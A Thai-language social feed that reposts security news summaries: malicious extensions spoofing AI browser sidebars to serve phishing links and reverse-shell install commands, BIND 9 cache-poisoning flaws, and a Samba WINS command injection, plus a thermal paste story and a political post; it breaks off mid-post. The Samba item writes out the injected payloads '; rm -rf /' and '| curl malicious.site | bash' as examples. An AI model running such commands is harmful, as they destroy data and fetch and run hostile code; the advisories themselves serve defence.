• AI Sidebar Spoofing: SquareX เตือนภัยส่วนขยายปลอมที่แอบอ้างเป็น Sidebar ของ AI Browser

    SquareX บริษัทด้านความปลอดภัยเบราว์เซอร์ ได้เปิดเผยการโจมตีรูปแบบใหม่ที่เรียกว่า “AI Sidebar Spoofing” ซึ่งใช้ส่วนขยายเบราว์เซอร์ที่เป็นอันตรายในการปลอมแปลงหน้าต่าง Sidebar ของ AI browser เช่น Comet, Brave, Edge และ Firefox เพื่อหลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI จริง

    การโจมตีนี้อาศัยความไว้วางใจของผู้ใช้ที่มีต่อ AI browser ซึ่งมักใช้ Sidebar เป็นช่องทางหลักในการโต้ตอบกับ AI โดยผู้โจมตีจะสร้างส่วนขยายที่สามารถแสดง Sidebar ปลอมได้อย่างแนบเนียน เมื่อผู้ใช้พิมพ์คำถามหรือขอคำแนะนำ Sidebar ปลอมจะตอบกลับด้วยคำแนะนำที่แฝงคำสั่งอันตราย เช่น ลิงก์ฟิชชิ่ง, คำสั่ง reverse shell หรือ OAuth phishing

    SquareX ยกตัวอย่างกรณีศึกษาหลายกรณี เช่น การหลอกให้ผู้ใช้เข้าสู่เว็บไซต์ Binance ปลอมเพื่อขโมยคริปโต, การแนะนำเว็บไซต์แชร์ไฟล์ที่เป็น OAuth trap เพื่อเข้าถึง Gmail และ Google Drive, หรือการแนะนำคำสั่งติดตั้ง Homebrew ที่แฝง reverse shell เพื่อยึดเครื่องของเหยื่อ

    ที่น่ากังวลคือ ส่วนขยายเหล่านี้ใช้สิทธิ์พื้นฐานที่พบได้ทั่วไปในส่วนขยายยอดนิยม เช่น Grammarly หรือ password manager ทำให้ยากต่อการตรวจจับ และสามารถทำงานได้บนเบราว์เซอร์ทุกชนิดที่มี Sidebar AI โดยไม่จำกัดเฉพาะ AI browser

    ลักษณะของการโจมตี AI Sidebar Spoofing
    ใช้ส่วนขยายเบราว์เซอร์ปลอมแปลง Sidebar ของ AI browser
    หลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI
    สามารถทำงานได้บนเบราว์เซอร์ทั่วไปที่มี Sidebar AI เช่น Edge, Brave, Firefox

    ตัวอย่างการโจมตี
    ลิงก์ฟิชชิ่งปลอมเป็น Binance เพื่อขโมยคริปโต
    OAuth phishing ผ่านเว็บไซต์แชร์ไฟล์ปลอม
    reverse shell แฝงในคำสั่งติดตั้ง Homebrew

    จุดอ่อนของระบบ
    ส่วนขยายใช้สิทธิ์พื้นฐานที่พบได้ทั่วไป ทำให้ยากต่อการตรวจจับ
    ไม่มีความแตกต่างด้านภาพหรือการทำงานระหว่าง Sidebar จริงกับ Sidebar ปลอม
    ส่วนขยายสามารถแฝงตัวและรอจังหวะที่เหมาะสมในการโจมตี

    การป้องกันจาก SquareX
    เสนอเครื่องมือ Browser Detection and Response (BDR)
    มีระบบตรวจจับและวิเคราะห์พฤติกรรมส่วนขยายแบบ runtime
    เสนอการตรวจสอบส่วนขยายทั้งองค์กรฟรี

    คำเตือนสำหรับผู้ใช้งานเบราว์เซอร์ที่มี AI Sidebar
    อย่าติดตั้งส่วนขยายจากแหล่งที่ไม่เชื่อถือ
    อย่าทำตามคำแนะนำจาก Sidebar โดยไม่ตรวจสอบความถูกต้อง
    ระวังคำสั่งที่เกี่ยวข้องกับการเข้าสู่ระบบ, การติดตั้งโปรแกรม หรือการแชร์ข้อมูล

    คำแนะนำเพิ่มเติม
    ใช้เบราว์เซอร์ที่มีระบบตรวจสอบส่วนขยายแบบละเอียด
    ตรวจสอบสิทธิ์ของส่วนขยายก่อนติดตั้ง
    อัปเดตเบราว์เซอร์และส่วนขยายให้เป็นเวอร์ชันล่าสุดเสมอ

    https://securityonline.info/ai-sidebar-spoofing-attack-squarex-uncovers-malicious-extensions-that-impersonate-ai-browser-sidebars/
    🕵️‍♂️ AI Sidebar Spoofing: SquareX เตือนภัยส่วนขยายปลอมที่แอบอ้างเป็น Sidebar ของ AI Browser SquareX บริษัทด้านความปลอดภัยเบราว์เซอร์ ได้เปิดเผยการโจมตีรูปแบบใหม่ที่เรียกว่า “AI Sidebar Spoofing” ซึ่งใช้ส่วนขยายเบราว์เซอร์ที่เป็นอันตรายในการปลอมแปลงหน้าต่าง Sidebar ของ AI browser เช่น Comet, Brave, Edge และ Firefox เพื่อหลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI จริง การโจมตีนี้อาศัยความไว้วางใจของผู้ใช้ที่มีต่อ AI browser ซึ่งมักใช้ Sidebar เป็นช่องทางหลักในการโต้ตอบกับ AI โดยผู้โจมตีจะสร้างส่วนขยายที่สามารถแสดง Sidebar ปลอมได้อย่างแนบเนียน เมื่อผู้ใช้พิมพ์คำถามหรือขอคำแนะนำ Sidebar ปลอมจะตอบกลับด้วยคำแนะนำที่แฝงคำสั่งอันตราย เช่น ลิงก์ฟิชชิ่ง, คำสั่ง reverse shell หรือ OAuth phishing SquareX ยกตัวอย่างกรณีศึกษาหลายกรณี เช่น การหลอกให้ผู้ใช้เข้าสู่เว็บไซต์ Binance ปลอมเพื่อขโมยคริปโต, การแนะนำเว็บไซต์แชร์ไฟล์ที่เป็น OAuth trap เพื่อเข้าถึง Gmail และ Google Drive, หรือการแนะนำคำสั่งติดตั้ง Homebrew ที่แฝง reverse shell เพื่อยึดเครื่องของเหยื่อ ที่น่ากังวลคือ ส่วนขยายเหล่านี้ใช้สิทธิ์พื้นฐานที่พบได้ทั่วไปในส่วนขยายยอดนิยม เช่น Grammarly หรือ password manager ทำให้ยากต่อการตรวจจับ และสามารถทำงานได้บนเบราว์เซอร์ทุกชนิดที่มี Sidebar AI โดยไม่จำกัดเฉพาะ AI browser ✅ ลักษณะของการโจมตี AI Sidebar Spoofing ➡️ ใช้ส่วนขยายเบราว์เซอร์ปลอมแปลง Sidebar ของ AI browser ➡️ หลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI ➡️ สามารถทำงานได้บนเบราว์เซอร์ทั่วไปที่มี Sidebar AI เช่น Edge, Brave, Firefox ✅ ตัวอย่างการโจมตี ➡️ ลิงก์ฟิชชิ่งปลอมเป็น Binance เพื่อขโมยคริปโต ➡️ OAuth phishing ผ่านเว็บไซต์แชร์ไฟล์ปลอม ➡️ reverse shell แฝงในคำสั่งติดตั้ง Homebrew ✅ จุดอ่อนของระบบ ➡️ ส่วนขยายใช้สิทธิ์พื้นฐานที่พบได้ทั่วไป ทำให้ยากต่อการตรวจจับ ➡️ ไม่มีความแตกต่างด้านภาพหรือการทำงานระหว่าง Sidebar จริงกับ Sidebar ปลอม ➡️ ส่วนขยายสามารถแฝงตัวและรอจังหวะที่เหมาะสมในการโจมตี ✅ การป้องกันจาก SquareX ➡️ เสนอเครื่องมือ Browser Detection and Response (BDR) ➡️ มีระบบตรวจจับและวิเคราะห์พฤติกรรมส่วนขยายแบบ runtime ➡️ เสนอการตรวจสอบส่วนขยายทั้งองค์กรฟรี ‼️ คำเตือนสำหรับผู้ใช้งานเบราว์เซอร์ที่มี AI Sidebar ⛔ อย่าติดตั้งส่วนขยายจากแหล่งที่ไม่เชื่อถือ ⛔ อย่าทำตามคำแนะนำจาก Sidebar โดยไม่ตรวจสอบความถูกต้อง ⛔ ระวังคำสั่งที่เกี่ยวข้องกับการเข้าสู่ระบบ, การติดตั้งโปรแกรม หรือการแชร์ข้อมูล ‼️ คำแนะนำเพิ่มเติม ⛔ ใช้เบราว์เซอร์ที่มีระบบตรวจสอบส่วนขยายแบบละเอียด ⛔ ตรวจสอบสิทธิ์ของส่วนขยายก่อนติดตั้ง ⛔ อัปเดตเบราว์เซอร์และส่วนขยายให้เป็นเวอร์ชันล่าสุดเสมอ https://securityonline.info/ai-sidebar-spoofing-attack-squarex-uncovers-malicious-extensions-that-impersonate-ai-browser-sidebars/
    0 Comments 0 Shares 60 Views 0 Reviews
  • DNS ระเบิดเวลา: ช่องโหว่ร้ายแรงใน BIND 9 เสี่ยงโจมตีแบบ Cache Poisoning และ DoS

    ถ้าคุณดูแลระบบ DNS ด้วย BIND 9 อยู่ล่ะก็ ข่าวนี้คือสัญญาณเตือนภัยไซเบอร์ที่คุณไม่ควรมองข้าม! Internet Systems Consortium (ISC) ได้ออกแพตช์อุดช่องโหว่ร้ายแรงถึง 3 รายการใน BIND 9 ซึ่งอาจเปิดทางให้แฮกเกอร์โจมตีแบบ cache poisoning และทำให้ระบบล่มได้แบบไม่ต้องยืนยันตัวตน

    ช่องโหว่ที่ร้ายแรงที่สุดคือ CVE-2025-40780 ซึ่งเกิดจากการใช้ pseudo-random number generator ที่ไม่ปลอดภัยในการเลือก source port และ query ID ทำให้แฮกเกอร์สามารถเดา transaction ID ได้ และส่งข้อมูลปลอมเข้าไปใน cache ของ DNS resolver ได้สำเร็จ

    อีกช่องโหว่หนึ่งคือ CVE-2025-40778 ที่เกิดจากการที่ BIND ยอมรับ resource records ที่ไม่ได้ร้องขอใน DNS response มากเกินไป ทำให้แฮกเกอร์สามารถแทรกข้อมูลปลอมเข้าไปใน cache ได้เช่นกัน

    ช่องโหว่สุดท้ายคือ CVE-2025-8677 ที่สามารถทำให้ CPU ของเซิร์ฟเวอร์หมดแรงได้ ด้วยการส่ง DNSKEY records ที่ถูกออกแบบมาอย่างเจาะจงให้ระบบทำงานหนักจนล่ม

    แม้ช่องโหว่เหล่านี้จะไม่กระทบกับ authoritative servers แต่ recursive resolvers กลับตกอยู่ในความเสี่ยงสูง และสามารถถูกโจมตีจากระยะไกลได้ทันทีหากยังไม่ได้อัปเดตแพตช์

    ช่องโหว่ที่ค้นพบใน BIND 9
    CVE-2025-40780: ใช้ pseudo-random ที่ไม่ปลอดภัย ทำให้เดา query ID ได้
    CVE-2025-40778: ยอมรับ resource records ที่ไม่ได้ร้องขอมากเกินไป
    CVE-2025-8677: ส่ง DNSKEY records ที่ทำให้ CPU ทำงานหนักจนล่ม

    เวอร์ชันที่ได้รับผลกระทบ
    BIND 9.11.0 → 9.16.50
    BIND 9.18.0 → 9.18.39
    BIND 9.20.0 → 9.20.13
    BIND 9.21.0 → 9.21.12

    วิธีการโจมตี
    ไม่ต้องยืนยันตัวตน
    ส่งข้อมูลปลอมผ่าน DNS response
    ใช้ zone ที่ออกแบบมาให้ทำให้ CPU ทำงานหนัก

    การแก้ไขจาก ISC
    ออกแพตช์ใหม่: 9.18.41, 9.20.15, 9.21.14
    แนะนำให้อัปเดตทันที

    คำเตือนสำหรับผู้ดูแลระบบ DNS
    หากยังไม่อัปเดต BIND อาจถูกโจมตีจากระยะไกลได้ทันที
    Cache poisoning อาจทำให้ผู้ใช้ถูก redirect ไปยังเว็บไซต์ปลอม
    การโจมตีแบบ CPU exhaustion อาจทำให้ DNS resolver ล่มทั้งระบบ

    คำแนะนำเพิ่มเติม
    ตรวจสอบว่าใช้เวอร์ชันที่ได้รับผลกระทบหรือไม่
    อัปเดตเป็นเวอร์ชันที่ได้รับการแก้ไขโดยเร็ว
    เฝ้าระวังการเปลี่ยนแปลงใน DNS cache และการทำงานของ CPU

    https://securityonline.info/isc-patches-multiple-high-severity-bind-vulnerabilities-enabling-cache-poisoning-and-denial-of-service-attacks/
    🧨 DNS ระเบิดเวลา: ช่องโหว่ร้ายแรงใน BIND 9 เสี่ยงโจมตีแบบ Cache Poisoning และ DoS ถ้าคุณดูแลระบบ DNS ด้วย BIND 9 อยู่ล่ะก็ ข่าวนี้คือสัญญาณเตือนภัยไซเบอร์ที่คุณไม่ควรมองข้าม! Internet Systems Consortium (ISC) ได้ออกแพตช์อุดช่องโหว่ร้ายแรงถึง 3 รายการใน BIND 9 ซึ่งอาจเปิดทางให้แฮกเกอร์โจมตีแบบ cache poisoning และทำให้ระบบล่มได้แบบไม่ต้องยืนยันตัวตน ช่องโหว่ที่ร้ายแรงที่สุดคือ CVE-2025-40780 ซึ่งเกิดจากการใช้ pseudo-random number generator ที่ไม่ปลอดภัยในการเลือก source port และ query ID ทำให้แฮกเกอร์สามารถเดา transaction ID ได้ และส่งข้อมูลปลอมเข้าไปใน cache ของ DNS resolver ได้สำเร็จ อีกช่องโหว่หนึ่งคือ CVE-2025-40778 ที่เกิดจากการที่ BIND ยอมรับ resource records ที่ไม่ได้ร้องขอใน DNS response มากเกินไป ทำให้แฮกเกอร์สามารถแทรกข้อมูลปลอมเข้าไปใน cache ได้เช่นกัน ช่องโหว่สุดท้ายคือ CVE-2025-8677 ที่สามารถทำให้ CPU ของเซิร์ฟเวอร์หมดแรงได้ ด้วยการส่ง DNSKEY records ที่ถูกออกแบบมาอย่างเจาะจงให้ระบบทำงานหนักจนล่ม แม้ช่องโหว่เหล่านี้จะไม่กระทบกับ authoritative servers แต่ recursive resolvers กลับตกอยู่ในความเสี่ยงสูง และสามารถถูกโจมตีจากระยะไกลได้ทันทีหากยังไม่ได้อัปเดตแพตช์ ✅ ช่องโหว่ที่ค้นพบใน BIND 9 ➡️ CVE-2025-40780: ใช้ pseudo-random ที่ไม่ปลอดภัย ทำให้เดา query ID ได้ ➡️ CVE-2025-40778: ยอมรับ resource records ที่ไม่ได้ร้องขอมากเกินไป ➡️ CVE-2025-8677: ส่ง DNSKEY records ที่ทำให้ CPU ทำงานหนักจนล่ม ✅ เวอร์ชันที่ได้รับผลกระทบ ➡️ BIND 9.11.0 → 9.16.50 ➡️ BIND 9.18.0 → 9.18.39 ➡️ BIND 9.20.0 → 9.20.13 ➡️ BIND 9.21.0 → 9.21.12 ✅ วิธีการโจมตี ➡️ ไม่ต้องยืนยันตัวตน ➡️ ส่งข้อมูลปลอมผ่าน DNS response ➡️ ใช้ zone ที่ออกแบบมาให้ทำให้ CPU ทำงานหนัก ✅ การแก้ไขจาก ISC ➡️ ออกแพตช์ใหม่: 9.18.41, 9.20.15, 9.21.14 ➡️ แนะนำให้อัปเดตทันที ‼️ คำเตือนสำหรับผู้ดูแลระบบ DNS ⛔ หากยังไม่อัปเดต BIND อาจถูกโจมตีจากระยะไกลได้ทันที ⛔ Cache poisoning อาจทำให้ผู้ใช้ถูก redirect ไปยังเว็บไซต์ปลอม ⛔ การโจมตีแบบ CPU exhaustion อาจทำให้ DNS resolver ล่มทั้งระบบ ‼️ คำแนะนำเพิ่มเติม ⛔ ตรวจสอบว่าใช้เวอร์ชันที่ได้รับผลกระทบหรือไม่ ⛔ อัปเดตเป็นเวอร์ชันที่ได้รับการแก้ไขโดยเร็ว ⛔ เฝ้าระวังการเปลี่ยนแปลงใน DNS cache และการทำงานของ CPU https://securityonline.info/isc-patches-multiple-high-severity-bind-vulnerabilities-enabling-cache-poisoning-and-denial-of-service-attacks/
    SECURITYONLINE.INFO
    ISC Patches Multiple High-Severity BIND Vulnerabilities Enabling Cache Poisoning and Denial of Service Attacks
    The Internet Systems Consortium (ISC) has issued patches for three high-severity vulnerabilities impacting the BIND 9 DNS server,
    0 Comments 0 Shares 68 Views 0 Reviews
  • ประเทศไทยอยู่ในภาวะสงครามตั้งแต่ยุคโควิด19 แต่ผู้ปกครองเรากากชัดเจน ไม่ประกาศจุดยืนภาวะนี้ให้คนไทยตื่นตัวออกมาทำสงครามกับสิ่งนี้จริงจัง,เราจะสร้างยามสร้างตาภาคประชาชนร่วมกันปำป้องเตือนภัยได้สบาย,ผ่านพ้นภัยนั้นได้ดีปลอดภัยร่วมกัน,ภาวะสงครามต่างๆเรา..ประเทศไทยจะตั้งมือรับมันได้ จะเรื่องใดๆเข้ามาก็ตามแม้ในภัยปัจจุบันแบบเขมรก็ง่ายจะจัดการ ตลอดฝรั่งพวกเบื้องหลังทั้งหมดจะอเมริกา รัสเชีย จีนดีจีนเทาทั้งในเขมรในไทยเราจะจัดการได้หมดตลอดไทยเทา เจ้าสัวเทาต่างๆด้วย นักการเมืองไทยเทา ข้าราชการไทยเทา เราจัดการได้หมด.
    ..ยุคโควิด19 นักการเมืองชั่วเลวทำเราคนไทยนี้ล่ะ.
    https://vm.tiktok.com/ZSHvxF1E2tQ4V-arzrj/
    ประเทศไทยอยู่ในภาวะสงครามตั้งแต่ยุคโควิด19 แต่ผู้ปกครองเรากากชัดเจน ไม่ประกาศจุดยืนภาวะนี้ให้คนไทยตื่นตัวออกมาทำสงครามกับสิ่งนี้จริงจัง,เราจะสร้างยามสร้างตาภาคประชาชนร่วมกันปำป้องเตือนภัยได้สบาย,ผ่านพ้นภัยนั้นได้ดีปลอดภัยร่วมกัน,ภาวะสงครามต่างๆเรา..ประเทศไทยจะตั้งมือรับมันได้ จะเรื่องใดๆเข้ามาก็ตามแม้ในภัยปัจจุบันแบบเขมรก็ง่ายจะจัดการ ตลอดฝรั่งพวกเบื้องหลังทั้งหมดจะอเมริกา รัสเชีย จีนดีจีนเทาทั้งในเขมรในไทยเราจะจัดการได้หมดตลอดไทยเทา เจ้าสัวเทาต่างๆด้วย นักการเมืองไทยเทา ข้าราชการไทยเทา เราจัดการได้หมด. ..ยุคโควิด19 นักการเมืองชั่วเลวทำเราคนไทยนี้ล่ะ. https://vm.tiktok.com/ZSHvxF1E2tQ4V-arzrj/
    0 Comments 0 Shares 42 Views 0 Reviews
  • "เตือนภัย! ซิลิโคน SGT-4 กลิ่นเปรี้ยว กัดกร่อนทองแดง ติดแน่นจนถอดไม่ออก"

    ในโลกของการระบายความร้อนซีพียูที่ต้องใช้ thermal paste หรือซิลิโคนเพื่อถ่ายเทความร้อนจากชิปไปยังฮีตซิงก์ มีผลิตภัณฑ์หนึ่งที่กำลังถูกวิจารณ์อย่างหนัก—SGT-4 TIM จากเกาหลีใต้ ซึ่งแม้จะได้รับรีวิวดีในร้านค้าออนไลน์ แต่กลับมีคุณสมบัติทางเคมีที่เป็นอันตรายต่ออุปกรณ์อย่างรุนแรง

    จากการสืบสวนโดย Igor Wallossek พบว่า SGT-4 ปล่อยไอกรดที่มีกลิ่นคล้ายน้ำส้มสายชู ซึ่งสามารถกัดกร่อนทองแดง ทำให้เกิดรอย “pitting” หรือหลุมเล็ก ๆ บนพื้นผิว และที่แย่กว่านั้นคือมันทำให้ฮีตซิงก์ติดแน่นกับซีพียูจนถอดออกไม่ได้

    ซิลิโคนนี้ใช้สาร RTV ที่มีการบ่มด้วยกรดอะซิติก ซึ่งเมื่อสัมผัสความชื้นจะปล่อยกรดออกมา ทำให้เกิดปฏิกิริยาเคมีกับโลหะ โดยเฉพาะทองแดงที่ใช้ในฮีตซิงก์และฝาซีพียู ส่งผลให้ประสิทธิภาพการระบายความร้อนลดลงอย่างมาก

    แม้ผู้ผลิตจะอ้างว่าผลิตภัณฑ์ผ่านมาตรฐาน RoHS และ REACH แต่การกัดกร่อนโลหะและการปล่อยสารที่มีฤทธิ์ทางเคมีถือเป็นปัญหาที่ไม่ควรมองข้าม

    คุณสมบัติของ SGT-4 TIM
    เป็น thermal paste ราคาถูกจากเกาหลีใต้
    ได้รับรีวิวดีในร้านค้าออนไลน์
    ใช้สาร RTV ที่ปล่อยกรดอะซิติกเมื่อสัมผัสความชื้น

    ผลกระทบต่ออุปกรณ์
    กัดกร่อนทองแดง ทำให้เกิด pitting และรอยด่าง
    ทำให้ฮีตซิงก์ติดแน่นกับซีพียูจนถอดออกไม่ได้
    ลดประสิทธิภาพการระบายความร้อนจากการสร้างช่องว่างใหม่แทนที่จะเติมเต็ม

    คำเตือนจากการใช้งาน
    ไอกรดที่ปล่อยออกมามีกลิ่นคล้ายน้ำส้มสายชู
    อาจทำให้ซีพียูเสียหายถาวรจากการกัดกร่อน
    การถอดฮีตซิงก์อาจทำให้ซีพียูหลุดออกจากซ็อกเก็ตอย่างรุนแรง

    การตรวจสอบทางเคมี
    พบสาร methyltriacetoxysilane ซึ่งเป็นตัวบ่มที่ปล่อยกรด
    ไม่ใช่ซิลิโคนมาตรฐานแบบ PMDS ที่ใช้ทั่วไป
    การวิเคราะห์จากผู้ใช้และห้องแล็บยืนยันผลกระทบทางเคมี

    ปฏิกิริยาของผู้ผลิต
    ปฏิเสธข้อกล่าวหาและตอบโต้ด้วยการดูหมิ่นผู้วิจัย
    ไม่เปิดเผยส่วนประกอบของผลิตภัณฑ์
    อ้างมาตรฐานสิ่งแวดล้อมที่ไม่เกี่ยวข้องกับปฏิกิริยาเคมี

    สาระเพิ่มเติมจากภายนอก:
    ความเข้าใจเรื่อง RTV silicone
    RTV (Room Temperature Vulcanizing) เป็นซิลิโคนที่บ่มตัวเองเมื่อสัมผัสอากาศ
    มีหลายชนิด เช่น แบบบ่มด้วยกรด, แบบบ่มด้วยแอลกอฮอล์ ซึ่งมีผลต่อความปลอดภัยต่างกัน

    วิธีเลือก thermal paste อย่างปลอดภัย
    ควรเลือกแบรนด์ที่มีการทดสอบจากแหล่งที่เชื่อถือได้
    หลีกเลี่ยงผลิตภัณฑ์ที่ไม่เปิดเผยส่วนประกอบ
    ตรวจสอบรีวิวจากผู้ใช้จริงในชุมชนฮาร์ดแวร์

    https://www.tomshardware.com/pc-components/thermal-paste/stinky-thermal-paste-emits-acidic-vapors-corrodes-copper-glues-heatsinks-to-processors-and-permanently-damages-coolers-sgt-4-tim-is-a-chemically-reactive-blend-finds-investigation
    🧊 "เตือนภัย! ซิลิโคน SGT-4 กลิ่นเปรี้ยว กัดกร่อนทองแดง ติดแน่นจนถอดไม่ออก" ในโลกของการระบายความร้อนซีพียูที่ต้องใช้ thermal paste หรือซิลิโคนเพื่อถ่ายเทความร้อนจากชิปไปยังฮีตซิงก์ มีผลิตภัณฑ์หนึ่งที่กำลังถูกวิจารณ์อย่างหนัก—SGT-4 TIM จากเกาหลีใต้ ซึ่งแม้จะได้รับรีวิวดีในร้านค้าออนไลน์ แต่กลับมีคุณสมบัติทางเคมีที่เป็นอันตรายต่ออุปกรณ์อย่างรุนแรง จากการสืบสวนโดย Igor Wallossek พบว่า SGT-4 ปล่อยไอกรดที่มีกลิ่นคล้ายน้ำส้มสายชู ซึ่งสามารถกัดกร่อนทองแดง ทำให้เกิดรอย “pitting” หรือหลุมเล็ก ๆ บนพื้นผิว และที่แย่กว่านั้นคือมันทำให้ฮีตซิงก์ติดแน่นกับซีพียูจนถอดออกไม่ได้ ซิลิโคนนี้ใช้สาร RTV ที่มีการบ่มด้วยกรดอะซิติก ซึ่งเมื่อสัมผัสความชื้นจะปล่อยกรดออกมา ทำให้เกิดปฏิกิริยาเคมีกับโลหะ โดยเฉพาะทองแดงที่ใช้ในฮีตซิงก์และฝาซีพียู ส่งผลให้ประสิทธิภาพการระบายความร้อนลดลงอย่างมาก แม้ผู้ผลิตจะอ้างว่าผลิตภัณฑ์ผ่านมาตรฐาน RoHS และ REACH แต่การกัดกร่อนโลหะและการปล่อยสารที่มีฤทธิ์ทางเคมีถือเป็นปัญหาที่ไม่ควรมองข้าม ✅ คุณสมบัติของ SGT-4 TIM ➡️ เป็น thermal paste ราคาถูกจากเกาหลีใต้ ➡️ ได้รับรีวิวดีในร้านค้าออนไลน์ ➡️ ใช้สาร RTV ที่ปล่อยกรดอะซิติกเมื่อสัมผัสความชื้น ✅ ผลกระทบต่ออุปกรณ์ ➡️ กัดกร่อนทองแดง ทำให้เกิด pitting และรอยด่าง ➡️ ทำให้ฮีตซิงก์ติดแน่นกับซีพียูจนถอดออกไม่ได้ ➡️ ลดประสิทธิภาพการระบายความร้อนจากการสร้างช่องว่างใหม่แทนที่จะเติมเต็ม ‼️ คำเตือนจากการใช้งาน ⛔ ไอกรดที่ปล่อยออกมามีกลิ่นคล้ายน้ำส้มสายชู ⛔ อาจทำให้ซีพียูเสียหายถาวรจากการกัดกร่อน ⛔ การถอดฮีตซิงก์อาจทำให้ซีพียูหลุดออกจากซ็อกเก็ตอย่างรุนแรง ✅ การตรวจสอบทางเคมี ➡️ พบสาร methyltriacetoxysilane ซึ่งเป็นตัวบ่มที่ปล่อยกรด ➡️ ไม่ใช่ซิลิโคนมาตรฐานแบบ PMDS ที่ใช้ทั่วไป ➡️ การวิเคราะห์จากผู้ใช้และห้องแล็บยืนยันผลกระทบทางเคมี ‼️ ปฏิกิริยาของผู้ผลิต ⛔ ปฏิเสธข้อกล่าวหาและตอบโต้ด้วยการดูหมิ่นผู้วิจัย ⛔ ไม่เปิดเผยส่วนประกอบของผลิตภัณฑ์ ⛔ อ้างมาตรฐานสิ่งแวดล้อมที่ไม่เกี่ยวข้องกับปฏิกิริยาเคมี 📎 สาระเพิ่มเติมจากภายนอก: ✅ ความเข้าใจเรื่อง RTV silicone ➡️ RTV (Room Temperature Vulcanizing) เป็นซิลิโคนที่บ่มตัวเองเมื่อสัมผัสอากาศ ➡️ มีหลายชนิด เช่น แบบบ่มด้วยกรด, แบบบ่มด้วยแอลกอฮอล์ ซึ่งมีผลต่อความปลอดภัยต่างกัน ✅ วิธีเลือก thermal paste อย่างปลอดภัย ➡️ ควรเลือกแบรนด์ที่มีการทดสอบจากแหล่งที่เชื่อถือได้ ➡️ หลีกเลี่ยงผลิตภัณฑ์ที่ไม่เปิดเผยส่วนประกอบ ➡️ ตรวจสอบรีวิวจากผู้ใช้จริงในชุมชนฮาร์ดแวร์ https://www.tomshardware.com/pc-components/thermal-paste/stinky-thermal-paste-emits-acidic-vapors-corrodes-copper-glues-heatsinks-to-processors-and-permanently-damages-coolers-sgt-4-tim-is-a-chemically-reactive-blend-finds-investigation
    0 Comments 0 Shares 138 Views 0 Reviews
  • “ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน

    ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf

    ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash

    เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที

    ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ

    ทีม Samba แนะนำให้ผู้ดูแลระบบ:
    ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf
    ปิดการใช้งาน WINS server (wins support = no)
    อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9

    ข้อมูลในข่าว
    ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม
    เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell
    ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน
    มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook”
    WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ
    NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้
    Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ
    วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no)
    เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9
    “wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต

    https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/
    🧨 “ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง 